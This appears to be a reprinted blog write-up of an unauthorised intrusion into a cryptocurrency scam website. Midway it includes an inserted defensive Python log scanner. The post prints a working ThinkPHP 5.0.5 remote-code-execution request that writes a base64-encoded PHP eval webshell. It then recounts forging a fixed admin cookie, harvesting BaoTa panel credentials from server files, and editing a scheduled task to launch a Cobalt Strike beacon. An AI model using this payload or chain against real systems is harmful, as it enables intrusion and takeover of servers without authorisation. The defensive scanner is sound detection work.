Title: A penetration test of a certain pig-butchering scam site

Recently I stumbled across a cryptocurrency "pig-butchering" scam site, so I ran a round of tests on it. The front page looked like this:

[image]

Entry was through the ThinkPHP 5.0.5 RCE, which was used to successfully write a webshell:

s=index|think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))
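One defender-side check that this entry point suggests, added here as an example that is not part of the original post: a small Python scanner that flags ThinkPHP 5.0.x `invokefunction` route abuse in web-server access logs. The log lines are constructed, and the callable list and log regex are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines in combined-log format (not taken from the original post).
SAMPLE_LOG = [
    r'203.0.113.5 - - [10/Sep/2020:12:00:01 +0800] "GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() HTTP/1.1" 200 5123',
    r'198.51.100.7 - - [10/Sep/2020:12:00:02 +0800] "GET /index.php?s=index/article/list&page=2 HTTP/1.1" 200 812',
    r'203.0.113.5 - - [10/Sep/2020:12:00:03 +0800] "GET /index.php?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=x.php HTTP/1.1" 500 0',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Callables that have no business in an invokefunction request; the list is an assumption
# for this example and should be extended to match your own policy.
SUSPICIOUS_CALLABLES = {
    "assert", "eval", "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "pcntl_exec", "call_user_func", "call_user_func_array", "file_put_contents",
}


def inspect_uri(uri):
    """Return why a request URI looks like ThinkPHP 5.0.x invokefunction abuse ([] if clean)."""
    _path, _, query = uri.partition("?")
    params = parse_qs(query, keep_blank_values=True)  # decodes %5C, %5B... in keys and values
    route = params.get("s", [""])[0].lower()
    reasons = []
    if "invokefunction" in route or "think\\app" in route:
        reasons.append("route=" + route)
    for key, values in params.items():
        # 'function', 'vars[0]', 'vars[1][]' ... carry the callable and its arguments
        if key.split("[", 1)[0] in ("function", "vars"):
            reasons += [f"{key}={v}" for v in values if v.strip().lower() in SUSPICIOUS_CALLABLES]
    return reasons


def scan_log(lines):
    """Parse combined-log lines and return a finding for every request inspect_uri flags."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; in production, count these separately
        reasons = inspect_uri(m.group("uri"))
        if reasons:
            findings.append({"ip": m.group("ip"), "status": m.group("status"), "reasons": reasons})
    return findings
```

Variants that carry the payload in a POST body are invisible to an access log, so pair this with request-body logging or a WAF rule at the front of the ThinkPHP application.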

Checking phpinfo showed that every function capable of executing system commands had been disabled, and neither COM nor dl() loading could be used to run commands either, as shown below:

[image]

assert, system, passthru, exec, pcntl_exec, shell_exec, popen, proc_open // all of PHP's system-command functions are disabled

However, file read/write was still possible, since functions such as assert() and file_put_contents() were not disabled. On checking, the target turned out to be a Windows system, as shown below:

[image]

With every PHP command-execution function disabled, not being able to run system commands was very frustrating. After downloading the site's source code and skimming it, I found that the administrator cookie is a fixed value that can be forged as follows, which looks like a backdoor:

[image]

So the admin backend login can be bypassed: since the administrator cookie is fixed, just add that cookie field. Open the browser's F12 tools, add the key/value above to the cookie, visit the index, and you are logged into the backend as shown below. There is a lot of money here (many people have been scammed):

[image]

On the front end I asked customer service and obtained the transfer account (the way the pig-butchering scam works is that the user transfers money into an account provided by customer service, then tops up the corresponding balance in their own account, which goes to the backend for review; once approved, they can use that balance to "invest" and trade coins). I kept this as evidence to submit:

[image]

Since system commands still could not be executed, breaking through meant rummaging through the files on the server. Going through the system files, I found that the Pagoda (BaoTa panel) folder exists. Probing confirmed that the Pagoda service is indeed running, but the default login port had been changed, as shown below:

[image]

Looking through the Pagoda files, I found admin_path.pl, the file that stores the panel's admin path, as shown below:

[image]

I found the Pagoda login portal and successfully accessed it, as shown below:

[image]

Continuing to search, I found a default.pl file, which stores the corresponding login password:

[image]

After getting the password, I tried the default username and found it was wrong and could not log in. Continuing through the files, the default.db file records login history, and the login account was found there:

[image]

Using that account and password, I successfully logged in to the Pagoda management backend, as shown below:

[image]

Find the scheduled tasks, modify one to execute the Cobalt Strike (CS) beacon, and once the beacon is online, change the task back, as shown below:

[image]

The CS beacon came online successfully, as shown below:

[image]

Checking the IP showed only a public address and no intranet. Several other machines in the same /24 are all running the same setup, so I did not go any further:

[image]

They are all the same setup; nothing interesting.

Reprinted from the original article: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486570idx=1sn=0c20fbbf4adbeb5b555164438b3197f7chksm=ce67a6f3f9102fe51b76482cd7d6bb644631ae469d8c1802956034077137ecd49ea56c8d2b1fscene=21#wechat_redirect

https://xz.aliyun.com/t/8224
